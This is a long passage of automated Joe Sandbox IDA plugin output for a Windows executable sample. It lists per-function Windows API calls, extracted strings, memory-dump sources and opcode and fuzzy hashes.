                                                                                                                                                                                                                                                                          • Instruction ID: c448fc87b9173ebd44963bfac62597c1883aca9cc8355c4c1cc0d38cf0676a35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 180fca24ba728ce6a0bcddca8d1c4a04078a57ba949d219ff14457bb1e964b95
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A41A871B84308BFEB149F248C46FAE77A9AF59B05F01062DFB097A1C1DAB1AC50CB55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0116A220,DF534560,0116A220), ref: 00219741
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00219751
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00219777
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 2351996187-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: f55f1612b7e2f9687bb5f7dc649eed1be58f6794adc9089239c712246381c418
                                                                                                                                                                                                                                                                          • Instruction ID: 76d153373c80e2d0ed6a0192840cbfabdb60e219a252d4eb9e536fa4ac424dad
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f55f1612b7e2f9687bb5f7dc649eed1be58f6794adc9089239c712246381c418
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7741DFB1920212AFDB10CF58DD44AAAF7A8FF15710F104329E925D7291E732EDA5CBD0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6A571010
                                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6A5710F6
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                          • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                                          • Opcode ID: 6267d74c8eb6995bd554614d6fc93b5d10c020b8632c76f637c6cc81656c7b78
                                                                                                                                                                                                                                                                          • Instruction ID: eb96029f92fa9a5e05a4f74f817554e99e05d39287ed424afa3da324587e1d97
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6267d74c8eb6995bd554614d6fc93b5d10c020b8632c76f637c6cc81656c7b78
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F417872900209AFCF12CF94CD95AEEBBB5BF48304F168059FA14BB261EB35D950DB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,DF534560,003EDCFC), ref: 002BDBB8
                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 002BDCC2
                                                                                                                                                                                                                                                                            • Part of subcall function 002AE8A0: std::locale::_Init.LIBCPMT ref: 002AE97D
                                                                                                                                                                                                                                                                            • Part of subcall function 002AC060: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 002AC135
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Failed to get Windows error message [win32 error 0x, xrefs: 002BDBD6
                                                                                                                                                                                                                                                                          • 8>, xrefs: 002BDC16
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FormatFreeInitIos_base_dtorLocalMessagestd::ios_base::_std::locale::_
                                                                                                                                                                                                                                                                          • String ID: 8>$Failed to get Windows error message [win32 error 0x
                                                                                                                                                                                                                                                                          • API String ID: 1983821583-1099289318
                                                                                                                                                                                                                                                                          • Opcode ID: be5cbee1f1229732826a2fa6c8ae03f408ac2835ebcee6ad681678562ccfe1bc
                                                                                                                                                                                                                                                                          • Instruction ID: a28be322755479c0a57c1f9827e805b70839208777f162d18c765d5d36c4c2df
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be5cbee1f1229732826a2fa6c8ae03f408ac2835ebcee6ad681678562ccfe1bc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A418D71A103099BDB10DF68C909BEEBBF8FF44704F104569E455AB290D7B8AA08CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoCreateGuid.OLE32(?,AA831995,?), ref: 6A549A87
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 6A549B32
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • pb[j, xrefs: 6A549A40
                                                                                                                                                                                                                                                                          • {%0.8X-%0.4X-%0.4X-%0.2X%0.2X-%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X}, xrefs: 6A549AD2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CountCreateGuidTick
                                                                                                                                                                                                                                                                          • String ID: pb[j${%0.8X-%0.4X-%0.4X-%0.2X%0.2X-%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X}
                                                                                                                                                                                                                                                                          • API String ID: 1175376463-4043172969
                                                                                                                                                                                                                                                                          • Opcode ID: bdf86ce1d1858136f4d1621b2403bc12168f7470b432f55028188b3d47ff842f
                                                                                                                                                                                                                                                                          • Instruction ID: 0c4fab55ae123e4644a256776926e6d5e2ee344bc7eb11f333ef4a3e48650ce2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdf86ce1d1858136f4d1621b2403bc12168f7470b432f55028188b3d47ff842f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F4141B19047599ECB20CFA5CC14BAEBBF8FF49714F10451AF555EB281D778A504CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 001C7396
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0045B428), ref: 001C73B6
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0045B428), ref: 001C73DA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 2351996187-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: b1b3e32d0fe1f2d4c7bafb1d7ede1ae3f1ff97a8a4ea45085a8eb47c756850b6
                                                                                                                                                                                                                                                                          • Instruction ID: b1f574e5362ff01381e2c987c05ddd35410ba6849d63371f368112b48f03a955
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1b3e32d0fe1f2d4c7bafb1d7ede1ae3f1ff97a8a4ea45085a8eb47c756850b6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E221BF71A04748EFD721CF58D900B9EBBE8FB05B15F10866EEC25D7781D7B9A5048B90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,?,6A5658A8), ref: 6A56516D
                                                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,AA831995,00000000,?,?,00000000,6A59C39D,000000FF,?,6A5658A8), ref: 6A56519C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6A5658A8), ref: 6A5651AC
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547E10: GetProcessHeap.KERNEL32 ref: 6A547E6C
                                                                                                                                                                                                                                                                            • Part of subcall function 6A549220: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,6A5659A5,-00000010), ref: 6A549258
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DirectoryRemove$ErrorFindHeapLastProcessResource
                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                          • API String ID: 3015187585-4282027825
                                                                                                                                                                                                                                                                          • Opcode ID: 5862b62bfeedc1df3e81c66e8252354a5fb3f2104e72fe389fcb5c652d12d74c
                                                                                                                                                                                                                                                                          • Instruction ID: 1f36efd989358faec1b1c58501e84c8197c6cd4d10a50ec053d46f92d528719f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5862b62bfeedc1df3e81c66e8252354a5fb3f2104e72fe389fcb5c652d12d74c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F216B72A80645AFDB05DFA8C808B9DB7B4FF05324F114A59EAA2D72A1DF359D04CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException,?,?,?,?,?,?,?,?,?,?,?,?,003BB955,000000FF), ref: 001BEB82
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 001BEB88
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID: RoOriginateLanguageException$combase.dll
                                                                                                                                                                                                                                                                          • API String ID: 2574300362-3996158991
                                                                                                                                                                                                                                                                          • Opcode ID: 41a355ca2361cf38e861cf4397057cb9cdab746faacb0f8c848329c71cbedd68
                                                                                                                                                                                                                                                                          • Instruction ID: 276b494ca903936dd536ab24b07a7cf2dfe3c302783e81aebf1e186f634e8760
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41a355ca2361cf38e861cf4397057cb9cdab746faacb0f8c848329c71cbedd68
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7318F31900209DFDB21DFA8C945BEEBBF4FB14314F10862AE825A72C1D778AA04CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: EnterCriticalSection.KERNEL32(00459EA0,?,?,001B9F37,0045AAD4,003CA720), ref: 00349802
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9F37,0045AAD4,003CA720), ref: 00349835
                                                                                                                                                                                                                                                                            • Part of subcall function 003497F8: RtlWakeAllConditionVariable.NTDLL ref: 003498AC
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: EnterCriticalSection.KERNEL32(00459EA0,-00000010,?,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?), ref: 0034984D
                                                                                                                                                                                                                                                                            • Part of subcall function 00349842: LeaveCriticalSection.KERNEL32(00459EA0,?,001B9EC6,0045AAD4,DF534560,?,?,0037191D,000000FF,?,001BCB1F,DF534560,-00000010,?,?,00000008), ref: 0034988A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionHeapProcessVariableWake
                                                                                                                                                                                                                                                                          • String ID: |u=
                                                                                                                                                                                                                                                                          • API String ID: 3269001908-2827651460
                                                                                                                                                                                                                                                                          • Opcode ID: 9f3cc5f2468fb667dc9491b40532f8d5d84ebc76fc9284193967b322708f499e
                                                                                                                                                                                                                                                                          • Instruction ID: 90f3f79deb77f109b84420a5599339f858586bd0d2a30d502e3efea6419dc62a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f3cc5f2468fb667dc9491b40532f8d5d84ebc76fc9284193967b322708f499e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D72180B1904300EBC711CF68EE45B897BE0E705726F10432AE5629B692D3B8AC24DB5B
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,002E683A,?,DF534560,?,?,?,000000FF,?,002E61F4), ref: 002E869D
                                                                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,002E683A,?,DF534560,?,?,?,000000FF,?,002E61F4,?), ref: 002E86BE
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,DF534560,?,?,?,000000FF,?,002E61F4,?,?,00000000,00000000,DF534560,?,?), ref: 002E871E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateEvent$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: AdvancedInstaller
                                                                                                                                                                                                                                                                          • API String ID: 1131763895-1372594473
                                                                                                                                                                                                                                                                          • Opcode ID: 87c38d3cd25b3d4299a628884d65f2aba3400ecdff7f421de3f18207b46c999e
                                                                                                                                                                                                                                                                          • Instruction ID: 8618cfcecf7e41e69710a13ad4d74581753632275daf37420c71bda0c311b2bf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87c38d3cd25b3d4299a628884d65f2aba3400ecdff7f421de3f18207b46c999e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66112B71790642FBE721DF22CD89F56BBA8FB44705F604428F6099B690DBB1F821CB94
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0045B428), ref: 001C710C
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 001C7120
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0045B428), ref: 001C715F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 2351996187-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: 6a68b6539ecd9214bdde456146327de968901c497deef634155fa5a68a12ffc9
                                                                                                                                                                                                                                                                          • Instruction ID: a4b6ae8d236490d2d731e1805807ad06c789ed6835bc0310fc5d383b0468ed82
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a68b6539ecd9214bdde456146327de968901c497deef634155fa5a68a12ffc9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1311E231A08755DBCB25CF58D804B6EFBE4FB55B15F18826ED825A3381C7B4A8008BD0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00346D1D
                                                                                                                                                                                                                                                                            • Part of subcall function 0034B0DB: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,-00000010,?,00000008,DF534560), ref: 0034B13B
                                                                                                                                                                                                                                                                          • std::regex_error::regex_error.LIBCPMT ref: 00346D3D
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00346D5D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
                                                                                                                                                                                                                                                                          • String ID: bad function call
                                                                                                                                                                                                                                                                          • API String ID: 182364050-3612616537
                                                                                                                                                                                                                                                                          • Opcode ID: 3c96efb4945b736d27663d8b9b9fc6900aa4f18773f74e67df8bfc6a0375797f
                                                                                                                                                                                                                                                                          • Instruction ID: efaf9cf8efb9acc5783da637149f14f868929dbb4339589aaec28d1f5dbfc8aa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c96efb4945b736d27663d8b9b9fc6900aa4f18773f74e67df8bfc6a0375797f
